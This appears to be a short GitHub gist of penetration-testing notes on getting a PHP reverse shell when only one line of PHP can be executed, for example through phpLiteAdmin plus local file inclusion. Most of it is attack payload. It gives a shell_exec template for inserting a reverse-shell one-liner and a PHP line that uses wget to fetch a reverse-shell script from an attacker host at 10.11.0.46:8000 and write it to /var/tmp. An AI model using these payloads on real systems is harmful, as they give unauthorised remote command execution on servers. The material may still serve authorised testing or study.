Created
October 30, 2017 22:14
-
-
Save jimmy-ly00/fb587bc102d66f1e41d84c4b4ea76fa3 to your computer and use it in GitHub Desktop.
One liner actual PHP code reverse shell
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| If you have access to executing php (and maybe LFI to visit the .php) e.g. phpLiteAdmin, but it only accepts one line so you cannot use the pentestmonkey php-reverse-shell.php | |
| 1. Use http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet in place of the one liner | |
| <?php echo shell_exec("[INSERT ONE LINER");?> | |
| 2. Guess programs on machine and use LFI to visit file | |
| <?php echo shell_exec("/usr/local/bin/wget http://10.11.0.46:8000/php-reverse-shell.php -O /var/tmp/shell.php 2>&1");?> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment